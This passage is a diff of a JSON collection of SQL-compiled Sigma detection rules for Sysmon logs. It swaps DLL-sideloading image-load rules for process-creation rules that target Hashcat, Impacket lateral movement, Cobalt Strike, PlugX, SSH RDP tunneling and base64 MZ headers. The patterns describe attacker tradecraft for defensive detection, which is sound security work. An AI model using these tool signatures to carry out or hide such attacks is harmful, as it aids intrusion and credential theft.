ESCAPE '\\')" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "status": "test", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Very unlikely" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR Image LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "status": "experimental", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": "image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", - "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "status": "experimental", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. 
spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE 
'\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR 
ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "status": "experimental", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": "image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a service binary running in a suspicious directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": "proc_creation_win_susp_service_dir.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", + "status": "experimental", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204.002" + "attack.t1059" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Griffon Malware Attack Pattern", + "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", + "status": "experimental", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - 
"attack.t1204.002" + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": "37db85d1-b089-490a-a59a-c7b6f984f480", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects usage of \"findstr\" with the argument \"385201\". 
Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + "title": "Suspicious Shells Spawn by Java Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "status": "experimental", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. 
adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.initial_access", "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_uac_bypass_via_dism.yml" + "filename": 
"proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "title": "Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "status": "experimental", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", + "status": "test", + 
"description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.s0013", "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image 
LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_office_dlls.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine 
